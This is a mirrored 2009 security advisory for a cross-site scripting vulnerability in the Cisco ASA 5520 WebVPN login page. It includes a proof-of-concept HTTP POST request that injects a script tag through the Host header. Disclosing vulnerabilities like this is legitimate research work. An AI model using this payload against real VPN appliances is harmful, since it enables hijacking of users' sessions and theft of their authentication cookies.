No account yet?
Home » Exploits » Cisco ASA Appliance WebVPN Cross Site Scripting Vulnerability
Cisco ASA Appliance WebVPN Cross Site Scripting Vulnerability E-mail
Feeds - Exploits
Written by Bugs NotHugs   
Tuesday, 31 March 2009 22:39
Cisco ASA Appliance WebVPN Cross Site Scripting Vulnerability


-\\Bugtraq ID:
34307

-\\Class:
Input Validation Error

-\\CVE:


-\\Remote:
Yes

-\\Local:
No

-\\Published:
Mar 31 2009 12:00AM

-\\Updated:
Mar 31 2009 05:16PM

-\\Credit:
Bugs NotHugs



-\\Vulnerable:
Cisco ASA 5520  0



-\\Discussion
Cisco ASA is prone to a cross-site scripting vulnerability.

An attacker may leverage this issue to execute arbitrary script code in the browser of an
nsuspecting user in the context of the affected site and to steal cookie-based authentication credentials.

Cisco ASA 5520 running IOS 7.2(2)22 is vulnerable; other versions may also be affected.



-\\Exploit(s)/PoC(s):
An attacker can exploit this issue by enticing an unsuspecting victim to follow a
malicious HTTP request.

The following example is available:

===============================================================
34307.txt
^^^^^^^^^^
POST /+webvpn+/index.html HTTP/1.1
Host: "'><script>alert('BugsNotHugs')</script><meta httpequiv=""
content='"www.example.org
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg,
application/x-shockwave-flash, application/vnd.ms-excel,
application/vnd.ms-powerpoint, application/msword, */*
Referer: https://www.example.com/+webvpn+/index.html
Accept-Language: en-us
Content-Type: application/x-www-form-urlencoded
UA-CPU: x86
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/1.3 (compatible; MSIE 3.0; Windows 3.11; .NET CLR 1.1.1032)
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: webvpnlogin=1
Content-Length: 66

username=psirt&password=easy&Login=Login&next=&tgroup=&tgcookieset=




-\\Solution
Currently we are not aware of any vendor-supplied patches. If you feel we are in error or
 if you are aware of more recent information, please mail us at: This e-mail address is being protected from spambots. You need JavaScript enabled to view it .



-\\References(s)
--ASA Product Page
Cisco ASA5520 Web VPN Host Header XS  (Cisco)
--Cisco ASA5520 Web VPN Host Header XSS
http://www.securityfocus.com/archive/1/50231  (Bugs NotHugs < This e-mail address is being protected from spambots. You need JavaScript enabled to view it >)
--Cisco ASA5520 Web VPN Host Header XSS
http://www.securityfocus.com/archive/1/50231  (Bugs NotHugs < This e-mail address is being protected from spambots. You need JavaScript enabled to view it >)
 

Security Services by HSC

Contact us

Become partner
Advertise with us
Join our staff